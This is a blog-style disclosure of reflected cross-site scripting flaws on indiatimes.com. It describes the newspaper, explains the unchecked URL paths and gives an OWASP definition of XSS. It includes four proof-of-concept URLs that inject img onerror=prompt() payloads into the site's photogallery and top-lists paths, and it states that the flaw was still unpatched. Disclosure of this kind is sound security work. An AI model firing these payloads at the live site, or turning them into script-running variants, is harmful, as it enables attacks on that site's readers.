(1) Domain Description:
http://www.indiatimes.com
"The
Times of India (TOI) is an Indian English-language daily newspaper. It
is the third-largest newspaper in India by circulation and largest
selling English-language daily in the world according to Audit Bureau of
Circulations (India). According to the Indian Readership Survey (IRS)
2012, the Times of India is the most widely read English newspaper in
India with a readership of 7.643 million. This ranks the Times of India
as the top English daily in India by readership. It
is owned and published by Bennett, Coleman & Co. Ltd. which is
owned by the Sahu Jain family. In the Brand Trust Report 2012, Times of
India was ranked 88th among India's most trusted brands and
subsequently, according to the Brand Trust Report 2013, Times of India
was ranked 100th among India's most trusted brands. In 2014 however,
Times of India was ranked 174th among India's most trusted brands
according to the Brand Trust Report 2014, a study conducted by Trust
Research Advisory." (en.Wikipedia.org)
(2) Vulnerability description:
The web application indiatimes.com online website has a security problem. Hacker can exploit it by XSS bugs.
The
code flaw occurs at Indiatimes's URL links. Indiatimes only filter part
of the filenames in its website. All URLs under Indiatimes's
"photogallery" and "top-llists" topics are affected.
Indiatimes
uses part of the links under "photogallery" and "top-llists" topics to
construct its website content without any checking of those links at
all. This mistake is very popular in nowaday websites. Developer is not
security expert.
The
vulnerability can be attacked without user login. Tests were performed
on Mozilla Firefox (26.0) in Ubuntu (12.04) and Microsoft IE (9.0.15) in
Windows 7.
POC Codes:
http://www.indiatimes.com/ photogallery/">homeqingdao<img src=x onerror=prompt('justqdjing')>
http://www.indiatimes.com/top- lists/">singaporemanagementuniversity<img src=x onerror=prompt('justqdjing')>
http://www.indiatimes.com/ photogallery/lifestyle/">astar<img src=x onerror=prompt('justqdjing')>
http://www.indiatimes.com/top- lists/technology/">nationaluniversityofsingapore<img src=x onerror=prompt('justqdjing')>
POC Video:
Blog Details:
What is XSS?
"Cross-Site
Scripting (XSS) attacks are a type of injection, in which malicious
scripts are injected into otherwise benign and trusted web sites. XSS
attacks occur when an attacker uses a web application to send malicious
code, generally in the form of a browser side script, to a different end
user. Flaws that allow these attacks to succeed are quite widespread
and occur anywhere a web application uses input from a user within the
output it generates without validating or encoding it." (OWASP)
(3) Vulnerability Disclosure:
The vulnerabilities were reported to Indiatimes in early September, 2014. However they are still unpatched.
Discovered and Reported by:
Wang
Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
Related Articles:
No comments:
Post a Comment